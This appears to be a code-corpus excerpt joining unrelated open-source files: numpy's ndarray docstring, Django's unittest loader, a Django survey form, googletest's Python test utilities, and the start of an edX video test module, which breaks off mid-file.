An array object represents a multidimensional, homogeneous array
of fixed-size items. An associated data-type object describes the
format of each element in the array (its byte-order, how many bytes it
occupies in memory, whether it is an integer, a floating point number,
or something else, etc.)
Arrays should be constructed using `array`, `zeros` or `empty` (refer
to the See Also section below). The parameters given here refer to
a low-level method (`ndarray(...)`) for instantiating an array.
For more information, refer to the `numpy` module and examine the
the methods and attributes of an array.
Parameters
----------
(for the __new__ method; see Notes below)
shape : tuple of ints
Shape of created array.
dtype : data-type, optional
Any object that can be interpreted as a numpy data type.
buffer : object exposing buffer interface, optional
Used to fill the array with data.
offset : int, optional
Offset of array data in buffer.
strides : tuple of ints, optional
Strides of data in memory.
order : {'C', 'F'}, optional
Row-major or column-major order.
Attributes
----------
T : ndarray
Transpose of the array.
data : buffer
The array's elements, in memory.
dtype : dtype object
Describes the format of the elements in the array.
flags : dict
Dictionary containing information related to memory use, e.g.,
'C_CONTIGUOUS', 'OWNDATA', 'WRITEABLE', etc.
flat : numpy.flatiter object
Flattened version of the array as an iterator. The iterator
allows assignments, e.g., ``x.flat = 3`` (See `ndarray.flat` for
assignment examples; TODO).
imag : ndarray
Imaginary part of the array.
real : ndarray
Real part of the array.
size : int
Number of elements in the array.
itemsize : int
The memory use of each array element in bytes.
nbytes : int
The total number of bytes required to store the array data,
i.e., ``itemsize * size``.
ndim : int
The array's number of dimensions.
shape : tuple of ints
Shape of the array.
strides : tuple of ints
The step-size required to move from one element to the next in
memory. For example, a contiguous ``(3, 4)`` array of type
``int16`` in C-order has strides ``(8, 2)``. This implies that
to move from element to element in memory requires jumps of 2 bytes.
To move from row-to-row, one needs to jump 8 bytes at a time
(``2 * 4``).
ctypes : ctypes object
Class containing properties of the array needed for interaction
with ctypes.
base : ndarray
If the array is a view into another array, that array is its `base`
(unless that array is also a view). The `base` array is where the
array data is actually stored.
See Also
--------
array : Construct an array.
zeros : Create an array, each element of which is zero.
empty : Create an array, but leave its allocated memory unchanged (i.e.,
it contains "garbage").
dtype : Create a data-type.
Notes
-----
There are two modes of creating an array using ``__new__``:
1. If `buffer` is None, then only `shape`, `dtype`, and `order`
are used.
2. If `buffer` is an object exposing the buffer interface, then
all keywords are interpreted.
No ``__init__`` method is needed because the array is fully initialized
after the ``__new__`` method.
Examples
--------
These examples illustrate the low-level `ndarray` constructor. Refer
to the `See Also` section above for easier ways of constructing an
ndarray.
First mode, `buffer` is None:
>>> np.ndarray(shape=(2,2), dtype=float, order='F')
array([[ -1.13698227e+002, 4.25087011e-303],
[ 2.88528414e-306, 3.27025015e-309]]) #random
Second mode:
>>> np.ndarray((2,), buffer=np.array([1,2,3]),
... offset=np.int_().itemsize,
... dtype=int) # offset = 1*itemsize, i.e. skip first element
array([2, 3])
"""
pass | apache-2.0 |
alx-eu/django | django/utils/unittest/loader.py | 109 | 13441 | """Loading unittests."""
import os
import re
import sys
import traceback
import types
import unittest
from fnmatch import fnmatch
from django.utils.unittest import case, suite
try:
from os.path import relpath
except ImportError:
from django.utils.unittest.compatibility import relpath
__unittest = True
def _CmpToKey(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) == -1
return K
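# Editor's note: illustrative sketch (not used by the loader) of how _CmpToKey
# adapts a Python 2 cmp-style comparison for key-based sorting.
def _example_cmp_to_key():
    return sorted([3, 1, 2], key=_CmpToKey(cmp))  # -> [1, 2, 3]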
# what about .pyc or .pyo (etc)
# we would need to avoid loading the same tests multiple times
# from '.py', '.pyc' *and* '.pyo'
VALID_MODULE_NAME = re.compile(r'[_a-z]\w*\.py$', re.IGNORECASE)
def _make_failed_import_test(name, suiteClass):
message = 'Failed to import test module: %s' % name
if hasattr(traceback, 'format_exc'):
# Python 2.3 compatibility
# format_exc returns two frames of discover.py as well
message += '\n%s' % traceback.format_exc()
return _make_failed_test('ModuleImportFailure', name, ImportError(message),
suiteClass)
def _make_failed_load_tests(name, exception, suiteClass):
return _make_failed_test('LoadTestsFailure', name, exception, suiteClass)
def _make_failed_test(classname, methodname, exception, suiteClass):
def testFailure(self):
raise exception
attrs = {methodname: testFailure}
TestClass = type(classname, (case.TestCase,), attrs)
return suiteClass((TestClass(methodname),))
class TestLoader(unittest.TestLoader):
"""
This class is responsible for loading tests according to various criteria
and returning them wrapped in a TestSuite
"""
testMethodPrefix = 'test'
sortTestMethodsUsing = cmp
suiteClass = suite.TestSuite
_top_level_dir = None
def loadTestsFromTestCase(self, testCaseClass):
"""Return a suite of all tests cases contained in testCaseClass"""
if issubclass(testCaseClass, suite.TestSuite):
raise TypeError("Test cases should not be derived from TestSuite."
" Maybe you meant to derive from TestCase?")
testCaseNames = self.getTestCaseNames(testCaseClass)
if not testCaseNames and hasattr(testCaseClass, 'runTest'):
testCaseNames = ['runTest']
loaded_suite = self.suiteClass(map(testCaseClass, testCaseNames))
return loaded_suite
def loadTestsFromModule(self, module, use_load_tests=True):
"""Return a suite of all tests cases contained in the given module"""
tests = []
for name in dir(module):
obj = getattr(module, name)
if isinstance(obj, type) and issubclass(obj, unittest.TestCase):
tests.append(self.loadTestsFromTestCase(obj))
load_tests = getattr(module, 'load_tests', None)
tests = self.suiteClass(tests)
if use_load_tests and load_tests is not None:
try:
return load_tests(self, tests, None)
except Exception as e:
return _make_failed_load_tests(module.__name__, e,
self.suiteClass)
return tests
def loadTestsFromName(self, name, module=None):
"""Return a suite of all tests cases given a string specifier.
The name may resolve either to a module, a test case class, a
test method within a test case class, or a callable object which
returns a TestCase or TestSuite instance.
The method optionally resolves the names relative to a given module.
"""
parts = name.split('.')
if module is None:
parts_copy = parts[:]
while parts_copy:
try:
module = __import__('.'.join(parts_copy))
break
except ImportError:
del parts_copy[-1]
if not parts_copy:
raise
parts = parts[1:]
obj = module
for part in parts:
parent, obj = obj, getattr(obj, part)
if isinstance(obj, types.ModuleType):
return self.loadTestsFromModule(obj)
elif isinstance(obj, type) and issubclass(obj, unittest.TestCase):
return self.loadTestsFromTestCase(obj)
elif (isinstance(obj, types.UnboundMethodType) and
isinstance(parent, type) and
issubclass(parent, case.TestCase)):
return self.suiteClass([parent(obj.__name__)])
elif isinstance(obj, unittest.TestSuite):
return obj
elif hasattr(obj, '__call__'):
test = obj()
if isinstance(test, unittest.TestSuite):
return test
elif isinstance(test, unittest.TestCase):
return self.suiteClass([test])
else:
raise TypeError("calling %s returned %s, not a test" %
(obj, test))
else:
raise TypeError("don't know how to make test from: %s" % obj)
def loadTestsFromNames(self, names, module=None):
"""Return a suite of all tests cases found using the given sequence
of string specifiers. See 'loadTestsFromName()'.
"""
suites = [self.loadTestsFromName(name, module) for name in names]
return self.suiteClass(suites)
def getTestCaseNames(self, testCaseClass):
"""Return a sorted sequence of method names found within testCaseClass
"""
def isTestMethod(attrname, testCaseClass=testCaseClass,
prefix=self.testMethodPrefix):
return attrname.startswith(prefix) and \
hasattr(getattr(testCaseClass, attrname), '__call__')
testFnNames = filter(isTestMethod, dir(testCaseClass))
if self.sortTestMethodsUsing:
testFnNames.sort(key=_CmpToKey(self.sortTestMethodsUsing))
return testFnNames
def discover(self, start_dir, pattern='test*.py', top_level_dir=None):
"""Find and return all test modules from the specified start
directory, recursing into subdirectories to find them. Only test files
that match the pattern will be loaded. (Using shell style pattern
matching.)
All test modules must be importable from the top level of the project.
If the start directory is not the top level directory then the top
level directory must be specified separately.
If a test package name (directory with '__init__.py') matches the
pattern then the package will be checked for a 'load_tests' function. If
this exists then it will be called with loader, tests, pattern.
If load_tests exists then discovery does *not* recurse into the package,
load_tests is responsible for loading all tests in the package.
The pattern is deliberately not stored as a loader attribute so that
packages can continue discovery themselves. top_level_dir is stored so
load_tests does not need to pass this argument in to loader.discover().
"""
set_implicit_top = False
if top_level_dir is None and self._top_level_dir is not None:
# make top_level_dir optional if called from load_tests in a package
top_level_dir = self._top_level_dir
elif top_level_dir is None:
set_implicit_top = True
top_level_dir = start_dir
top_level_dir = os.path.abspath(top_level_dir)
if not top_level_dir in sys.path:
# all test modules must be importable from the top level directory
# should we *unconditionally* put the start directory in first
# in sys.path to minimise likelihood of conflicts between installed
# modules and development versions?
sys.path.insert(0, top_level_dir)
self._top_level_dir = top_level_dir
is_not_importable = False
if os.path.isdir(os.path.abspath(start_dir)):
start_dir = os.path.abspath(start_dir)
if start_dir != top_level_dir:
is_not_importable = not os.path.isfile(os.path.join(start_dir, '__init__.py'))
else:
# support for discovery from dotted module names
try:
__import__(start_dir)
except ImportError:
is_not_importable = True
else:
the_module = sys.modules[start_dir]
top_part = start_dir.split('.')[0]
start_dir = os.path.abspath(os.path.dirname((the_module.__file__)))
if set_implicit_top:
self._top_level_dir = os.path.abspath(os.path.dirname(os.path.dirname(sys.modules[top_part].__file__)))
sys.path.remove(top_level_dir)
if is_not_importable:
raise ImportError('Start directory is not importable: %r' % start_dir)
tests = list(self._find_tests(start_dir, pattern))
return self.suiteClass(tests)
def _get_name_from_path(self, path):
path = os.path.splitext(os.path.normpath(path))[0]
_relpath = relpath(path, self._top_level_dir)
assert not os.path.isabs(_relpath), "Path must be within the project"
assert not _relpath.startswith('..'), "Path must be within the project"
name = _relpath.replace(os.path.sep, '.')
return name
def _get_module_from_name(self, name):
__import__(name)
return sys.modules[name]
def _match_path(self, path, full_path, pattern):
# override this method to use alternative matching strategy
return fnmatch(path, pattern)
def _find_tests(self, start_dir, pattern):
"""Used by discovery. Yields test suites it loads."""
paths = os.listdir(start_dir)
for path in paths:
full_path = os.path.join(start_dir, path)
if os.path.isfile(full_path):
if not VALID_MODULE_NAME.match(path):
# valid Python identifiers only
continue
if not self._match_path(path, full_path, pattern):
continue
# if the test file matches, load it
name = self._get_name_from_path(full_path)
try:
module = self._get_module_from_name(name)
except:
yield _make_failed_import_test(name, self.suiteClass)
else:
mod_file = os.path.abspath(getattr(module, '__file__', full_path))
realpath = os.path.splitext(mod_file)[0]
fullpath_noext = os.path.splitext(full_path)[0]
if realpath.lower() != fullpath_noext.lower():
module_dir = os.path.dirname(realpath)
mod_name = os.path.splitext(os.path.basename(full_path))[0]
expected_dir = os.path.dirname(full_path)
msg = ("%r module incorrectly imported from %r. Expected %r. "
"Is this module globally installed?")
raise ImportError(msg % (mod_name, module_dir, expected_dir))
yield self.loadTestsFromModule(module)
elif os.path.isdir(full_path):
if not os.path.isfile(os.path.join(full_path, '__init__.py')):
continue
load_tests = None
tests = None
if fnmatch(path, pattern):
# only check load_tests if the package directory itself matches the filter
name = self._get_name_from_path(full_path)
package = self._get_module_from_name(name)
load_tests = getattr(package, 'load_tests', None)
tests = self.loadTestsFromModule(package, use_load_tests=False)
if load_tests is None:
if tests is not None:
# tests loaded from package file
yield tests
# recurse into the package
for test in self._find_tests(full_path, pattern):
yield test
else:
try:
yield load_tests(self, tests, pattern)
except Exception as e:
yield _make_failed_load_tests(package.__name__, e,
self.suiteClass)
defaultTestLoader = TestLoader()
def _makeLoader(prefix, sortUsing, suiteClass=None):
loader = TestLoader()
loader.sortTestMethodsUsing = sortUsing
loader.testMethodPrefix = prefix
if suiteClass:
loader.suiteClass = suiteClass
return loader
def getTestCaseNames(testCaseClass, prefix, sortUsing=cmp):
return _makeLoader(prefix, sortUsing).getTestCaseNames(testCaseClass)
def makeSuite(testCaseClass, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromTestCase(testCaseClass)
def findTestCases(module, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromModule(module)
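# Example (a minimal sketch; the "tests" directory layout is hypothetical):
#
#   loader = TestLoader()
#   suite = loader.discover('tests', pattern='test_*.py', top_level_dir='.')
#   unittest.TextTestRunner(verbosity=2).run(suite)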
| bsd-3-clause |
prathapsridharan/health_project | health_project/questions/forms.py | 1 | 2744 | """Contains form class definitions for the forms of the questions app.
Classes: [
SurveyQuestionForm
]
"""
from django import forms
from django.core.urlresolvers import reverse
from crispy_forms.bootstrap import FormActions
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit, Layout
from . import config
from .models import ChoiceSelectionAnswerFormat, ListInputAnswerFormat
class SurveyQuestionForm(forms.Form):
"""Models a form for how a question should be posed to the user."""
answer_input = forms.CharField(
label = "",
required=False,
widget=forms.Textarea()
)
class Meta:
fields = ("answer_input")
def __init__(self, *args, **kwargs):
survey_question = kwargs.pop('survey_question', None)
super().__init__(*args, **kwargs)
# NOTE: It is assumed that all answer_formats belonging to a question
# are of the same type.
# TODO: ENHANCEMENT: Enforce same answer format instances or throw an
# error
answer_formats = survey_question.question.answer_formats.all()
answer_format = answer_formats[0]
# Determine what the type of 'answer_input' form field is and its
# associated widget type.
if isinstance(answer_format, ChoiceSelectionAnswerFormat):
choices = ((a.id, a.choice_name) for a in answer_formats)
label = ""
required = False
if (answer_format.answer_format_type == config.CHOICE_SELECTION_MANY_FORMAT):
self.fields['answer_input'] = forms.MultipleChoiceField(
label=label,
required=required,
choices=choices
)
self.fields['answer_input'].widget = forms.CheckboxSelectMultiple()
else:
self.fields['answer_input'] = forms.ChoiceField(
label=label,
required=required,
choices=choices
)
self.fields['answer_input'].widget = forms.RadioSelect()
elif isinstance(answer_format, ListInputAnswerFormat):
self.fields['answer_input'].help_text = "Please enter each new item on a new line."
self.helper = FormHelper()
self.helper.form_class = 'form-horizontal'
self.helper.form_method = 'post'
self.helper.form_action = reverse("questions:answer-survey-question")
self.helper.layout = Layout(
'answer_input',
)
self.helper.layout.append(
FormActions(
Submit('skip', 'Skip'),
Submit('submit', 'Submit', css_class='btn-primary'),
)
)
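# Example usage (a minimal sketch; "survey_question" is a hypothetical
# SurveyQuestion instance whose question carries ChoiceSelectionAnswerFormat
# rows, and "request" is a Django request -- neither is defined here):
#
#   form = SurveyQuestionForm(request.POST, survey_question=survey_question)
#   if form.is_valid():
#       # For a CHOICE_SELECTION_MANY_FORMAT question this is a list of
#       # selected answer-format ids; otherwise a single id or free text.
#       answer = form.cleaned_data['answer_input']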
| bsd-3-clause |
christofferpettersson/Aftermath | Code/External/googletest/test/gtest_test_utils.py | 674 | 10826 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test utilities for Google C++ Testing Framework."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import atexit
import os
import shutil
import sys
import tempfile
import unittest
_test_module = unittest
# Suppresses the 'Import not at the top of the file' lint complaint.
# pylint: disable-msg=C6204
try:
import subprocess
_SUBPROCESS_MODULE_AVAILABLE = True
except:
import popen2
_SUBPROCESS_MODULE_AVAILABLE = False
# pylint: enable-msg=C6204
GTEST_OUTPUT_VAR_NAME = 'GTEST_OUTPUT'
IS_WINDOWS = os.name == 'nt'
IS_CYGWIN = os.name == 'posix' and 'CYGWIN' in os.uname()[0]
# The environment variable for specifying the path to the premature-exit file.
PREMATURE_EXIT_FILE_ENV_VAR = 'TEST_PREMATURE_EXIT_FILE'
environ = os.environ.copy()
def SetEnvVar(env_var, value):
"""Sets/unsets an environment variable to a given value."""
if value is not None:
environ[env_var] = value
elif env_var in environ:
del environ[env_var]
# Here we expose a class from a particular module, depending on the
# environment. The comment suppresses the 'Invalid variable name' lint
# complaint.
TestCase = _test_module.TestCase # pylint: disable-msg=C6409
# Initially maps a flag to its default value. After
# _ParseAndStripGTestFlags() is called, maps a flag to its actual value.
_flag_map = {'source_dir': os.path.dirname(sys.argv[0]),
'build_dir': os.path.dirname(sys.argv[0])}
_gtest_flags_are_parsed = False
def _ParseAndStripGTestFlags(argv):
"""Parses and strips Google Test flags from argv. This is idempotent."""
# Suppresses the lint complaint about a global variable since we need it
# here to maintain module-wide state.
global _gtest_flags_are_parsed # pylint: disable-msg=W0603
if _gtest_flags_are_parsed:
return
_gtest_flags_are_parsed = True
for flag in _flag_map:
# The environment variable overrides the default value.
if flag.upper() in os.environ:
_flag_map[flag] = os.environ[flag.upper()]
# The command line flag overrides the environment variable.
i = 1 # Skips the program name.
while i < len(argv):
prefix = '--' + flag + '='
if argv[i].startswith(prefix):
_flag_map[flag] = argv[i][len(prefix):]
del argv[i]
break
else:
# We don't increment i in case we just found a --gtest_* flag
# and removed it from argv.
i += 1
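# Example (a minimal sketch; the argv value is hypothetical):
#
#   sys.argv = ['gtest_color_test.py', '--build_dir=/tmp/out', '-v']
#   _ParseAndStripGTestFlags(sys.argv)
#   # GetFlag('build_dir') now returns '/tmp/out' and the --build_dir flag
#   # has been stripped, leaving sys.argv == ['gtest_color_test.py', '-v'].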
def GetFlag(flag):
"""Returns the value of the given flag."""
# In case GetFlag() is called before Main(), we always call
# _ParseAndStripGTestFlags() here to make sure the --gtest_* flags
# are parsed.
_ParseAndStripGTestFlags(sys.argv)
return _flag_map[flag]
def GetSourceDir():
"""Returns the absolute path of the directory where the .py files are."""
return os.path.abspath(GetFlag('source_dir'))
def GetBuildDir():
"""Returns the absolute path of the directory where the test binaries are."""
return os.path.abspath(GetFlag('build_dir'))
_temp_dir = None
def _RemoveTempDir():
if _temp_dir:
shutil.rmtree(_temp_dir, ignore_errors=True)
atexit.register(_RemoveTempDir)
def GetTempDir():
"""Returns a directory for temporary files."""
global _temp_dir
if not _temp_dir:
_temp_dir = tempfile.mkdtemp()
return _temp_dir
def GetTestExecutablePath(executable_name, build_dir=None):
"""Returns the absolute path of the test binary given its name.
The function will print a message and abort the program if the resulting file
doesn't exist.
Args:
executable_name: name of the test binary that the test script runs.
build_dir: directory where to look for executables, by default
the result of GetBuildDir().
Returns:
The absolute path of the test binary.
"""
path = os.path.abspath(os.path.join(build_dir or GetBuildDir(),
executable_name))
if (IS_WINDOWS or IS_CYGWIN) and not path.endswith('.exe'):
path += '.exe'
if not os.path.exists(path):
message = (
'Unable to find the test binary "%s". Please make sure to provide\n'
'a path to the binary via the --build_dir flag or the BUILD_DIR\n'
'environment variable.' % path)
print >> sys.stderr, message
sys.exit(1)
return path
def GetExitStatus(exit_code):
"""Returns the argument to exit(), or -1 if exit() wasn't called.
Args:
exit_code: the result value of os.system(command).
"""
if os.name == 'nt':
# On Windows, os.WEXITSTATUS() doesn't work and os.system() returns
# the argument to exit() directly.
return exit_code
else:
# On Unix, os.WEXITSTATUS() must be used to extract the exit status
# from the result of os.system().
if os.WIFEXITED(exit_code):
return os.WEXITSTATUS(exit_code)
else:
return -1
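# Example (a minimal sketch; the shell command is hypothetical):
#
#   status = GetExitStatus(os.system('exit 3'))
#   # status == 3 on both Windows and Unix; -1 if the child did not exit
#   # normally (e.g. it was killed by a signal on Unix).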
class Subprocess:
def __init__(self, command, working_dir=None, capture_stderr=True, env=None):
"""Changes into a specified directory, if provided, and executes a command.
Restores the old directory afterwards.
Args:
command: The command to run, in the form of sys.argv.
working_dir: The directory to change into.
capture_stderr: Determines whether to capture stderr in the output member
or to discard it.
env: Dictionary with environment to pass to the subprocess.
Returns:
An object that represents outcome of the executed process. It has the
following attributes:
terminated_by_signal True iff the child process has been terminated
by a signal.
signal Signal that terminated the child process.
exited True iff the child process exited normally.
exit_code The code with which the child process exited.
output Child process's stdout and stderr output
combined in a string.
"""
# The subprocess module is the preferable way of running programs
# since it is available and behaves consistently on all platforms,
# including Windows. But it is only available starting in python 2.4.
# In earlier python versions, we revert to the popen2 module, which is
# available in python 2.0 and later but doesn't provide required
# functionality (Popen4) under Windows. This allows us to support Mac
# OS X 10.4 Tiger, which has python 2.3 installed.
if _SUBPROCESS_MODULE_AVAILABLE:
if capture_stderr:
stderr = subprocess.STDOUT
else:
stderr = subprocess.PIPE
p = subprocess.Popen(command,
stdout=subprocess.PIPE, stderr=stderr,
cwd=working_dir, universal_newlines=True, env=env)
# communicate() returns a tuple; the first element is the child's
# combined output as a string.
self.output = p.communicate()[0]
self._return_code = p.returncode
else:
old_dir = os.getcwd()
def _ReplaceEnvDict(dest, src):
# Changes made by os.environ.clear are not inheritable by child
# processes until Python 2.6. To produce inheritable changes we have
# to delete environment items with the del statement.
for key in dest.keys():
del dest[key]
dest.update(src)
# When 'env' is not None, backup the environment variables and replace
# them with the passed 'env'. When 'env' is None, we simply use the
# current 'os.environ' for compatibility with the subprocess.Popen
# semantics used above.
if env is not None:
old_environ = os.environ.copy()
_ReplaceEnvDict(os.environ, env)
try:
if working_dir is not None:
os.chdir(working_dir)
if capture_stderr:
p = popen2.Popen4(command)
else:
p = popen2.Popen3(command)
p.tochild.close()
self.output = p.fromchild.read()
ret_code = p.wait()
finally:
os.chdir(old_dir)
# Restore the old environment variables
# if they were replaced.
if env is not None:
_ReplaceEnvDict(os.environ, old_environ)
# Converts ret_code to match the semantics of
# subprocess.Popen.returncode.
if os.WIFSIGNALED(ret_code):
self._return_code = -os.WTERMSIG(ret_code)
else: # os.WIFEXITED(ret_code) should return True here.
self._return_code = os.WEXITSTATUS(ret_code)
if self._return_code < 0:
self.terminated_by_signal = True
self.exited = False
self.signal = -self._return_code
else:
self.terminated_by_signal = False
self.exited = True
self.exit_code = self._return_code
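# Example (a minimal sketch; the command is hypothetical):
#
#   p = Subprocess(['python', '-c', 'print "hi"'], capture_stderr=True)
#   if p.exited and p.exit_code == 0:
#     output = p.output               # combined stdout/stderr as a string
#   elif p.terminated_by_signal:
#     killed_by = p.signal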
def Main():
"""Runs the unit test."""
# We must call _ParseAndStripGTestFlags() before calling
# unittest.main(). Otherwise the latter will be confused by the
# --gtest_* flags.
_ParseAndStripGTestFlags(sys.argv)
# The tested binaries should not be writing XML output files unless the
# script explicitly instructs them to.
# TODO(vladl@google.com): Move this into Subprocess when we implement
# passing environment into it as a parameter.
if GTEST_OUTPUT_VAR_NAME in os.environ:
del os.environ[GTEST_OUTPUT_VAR_NAME]
_test_module.main()
| mit |
Edraak/edraak-platform | lms/djangoapps/courseware/tests/test_video_mongo.py | 8 | 91387 | # -*- coding: utf-8 -*-
"""
Video xmodule tests in mongo.
"""
import json
from collections import OrderedDict
from uuid import uuid4
from tempfile import mkdtemp
import shutil
import ddt
from django.conf import settings
from django.core.files import File
from django.core.files.base import ContentFile
from django.test import TestCase
from django.test.utils import override_settings
from fs.osfs import OSFS
from fs.path import combine
from edxval.api import (
ValCannotCreateError,
ValVideoNotFoundError,
create_video_transcript,
create_or_update_video_transcript,
create_profile,
create_video,
get_video_info,
get_video_transcript,
get_video_transcript_data
)
from edxval.utils import create_file_in_fs
from lxml import etree
from mock import MagicMock, Mock, patch
from nose.plugins.attrib import attr
from path import Path as path
from xmodule.contentstore.content import StaticContent
from xmodule.exceptions import NotFoundError
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.inheritance import own_metadata
from xmodule.modulestore.tests.django_utils import TEST_DATA_MONGO_MODULESTORE, TEST_DATA_SPLIT_MODULESTORE
from xmodule.tests.test_import import DummySystem
from xmodule.tests.test_video import VideoDescriptorTestBase, instantiate_descriptor
from xmodule.video_module import VideoDescriptor, bumper_utils, rewrite_video_url, video_utils
from xmodule.video_module.transcripts_utils import Transcript, save_to_store, subs_filename
from xmodule.video_module.video_module import EXPORT_IMPORT_STATIC_DIR, EXPORT_IMPORT_COURSE_DIR
from xmodule.x_module import STUDENT_VIEW
from .helpers import BaseTestXmodule
from .test_video_handlers import TestVideo
from .test_video_xml import SOURCE_XML
MODULESTORES = {
ModuleStoreEnum.Type.mongo: TEST_DATA_MONGO_MODULESTORE,
ModuleStoreEnum.Type.split: TEST_DATA_SPLIT_MODULESTORE,
}
TRANSCRIPT_FILE_SRT_DATA = u"""
1
00:00:14,370 --> 00:00:16,530
I am overwatch.
2
00:00:16,500 --> 00:00:18,600
可以用“我不太懂艺术 但我知道我喜欢什么”做比喻.
"""
TRANSCRIPT_FILE_SJSON_DATA = """{\n "start": [10],\n "end": [100],\n "text": ["Hi, welcome to edxval."]\n}"""
@attr(shard=7)
class TestVideoYouTube(TestVideo):
METADATA = {}
def test_video_constructor(self):
"""Make sure that all parameters extracted correctly from xml"""
context = self.item_descriptor.render(STUDENT_VIEW).content
sources = [u'example.mp4', u'example.webm']
expected_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'metadata': json.dumps(OrderedDict({
'autoAdvance': False,
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'autoplay': False,
'streams': '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg',
'sources': sources,
'duration': None,
'poster': None,
'captionDataDir': None,
'showCaptions': 'true',
'generalSpeed': 1.0,
'speed': None,
'savedVideoPosition': 0.0,
'start': 3603.0,
'end': 3610.0,
'transcriptLanguage': 'en',
'transcriptLanguages': OrderedDict({'en': 'English', 'uk': u'Українська'}),
'ytTestTimeout': 1500,
'ytApiUrl': 'https://www.youtube.com/iframe_api',
'ytMetadataUrl': 'https://www.googleapis.com/youtube/v3/videos/',
'ytKey': None,
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'autohideHtml5': False,
'recordedYoutubeIsAvailable': True,
'completionEnabled': False,
'completionPercentage': 0.95,
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
})),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
}
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context),
)
@attr(shard=7)
class TestVideoNonYouTube(TestVideo):
"""Integration tests: web client + mongo."""
DATA = """
<video show_captions="true"
display_name="A Name"
sub="a_sub_file.srt.sjson"
download_video="true"
start_time="01:00:03" end_time="01:00:10"
>
<source src="example.mp4"/>
<source src="example.webm"/>
</video>
"""
MODEL_DATA = {
'data': DATA,
}
METADATA = {}
def test_video_constructor(self):
"""Make sure that if the 'youtube' attribute is omitted in XML, then
the template generates an empty string for the YouTube streams.
"""
context = self.item_descriptor.render(STUDENT_VIEW).content
sources = [u'example.mp4', u'example.webm']
expected_context = {
'autoadvance_enabled': False,
'branding_info': None,
'license': None,
'bumper_metadata': 'null',
'cdn_eval': False,
'cdn_exp_group': None,
'display_name': u'A Name',
'download_video_link': u'example.mp4',
'handout': None,
'id': self.item_descriptor.location.html_id(),
'metadata': json.dumps(OrderedDict({
'autoAdvance': False,
'saveStateUrl': self.item_descriptor.xmodule_runtime.ajax_url + '/save_user_state',
'autoplay': False,
'streams': '1.00:3_yD_cEKoCk',
'sources': sources,
'duration': None,
'poster': None,
'captionDataDir': None,
'showCaptions': 'true',
'generalSpeed': 1.0,
'speed': None,
'savedVideoPosition': 0.0,
'start': 3603.0,
'end': 3610.0,
'transcriptLanguage': 'en',
'transcriptLanguages': OrderedDict({'en': 'English'}),
'ytTestTimeout': 1500,
'ytApiUrl': 'https://www.youtube.com/iframe_api',
'ytMetadataUrl': 'https://www.googleapis.com/youtube/v3/videos/',
'ytKey': None,
'transcriptTranslationUrl': self.get_handler_url('transcript', 'translation/__lang__'),
'transcriptAvailableTranslationsUrl': self.get_handler_url('transcript', 'available_translations'),
'autohideHtml5': False,
'recordedYoutubeIsAvailable': True,
'completionEnabled': False,
'completionPercentage': 0.95,
'publishCompletionUrl': self.get_handler_url('publish_completion', ''),
})),
'track': None,
'transcript_download_format': u'srt',
'transcript_download_formats_list': [
{'display_name': 'SubRip (.srt) file', 'value': 'srt'},
{'display_name': 'Text (.txt) file', 'value': 'txt'}
],
'poster': 'null',
}
self.assertEqual(
context,
self.item_descriptor.xmodule_runtime.render_template('video.html', expected_context),
)
@attr(shard=7)
@ddt.ddt
class TestGetHtmlMethod(BaseTestXmodule):
'''
Make sure that `get_html` works correctly.
'''
CATEGORY = "video"
DATA = SOURCE_XML
METADATA = {}
def setUp(self):
super(TestGetHtmlMethod, self).setUp()
self.setup_course()
self.default_metadata_dict = OrderedDict({
'autoAdvance': False,
'saveStateUrl': '',
'autoplay': settings.FEATURES.get('AUTOPLAY_VIDEOS', True),
'streams': '1.00:3_yD_cEKoCk',
'sources': '[]',
'duration': 111.0,
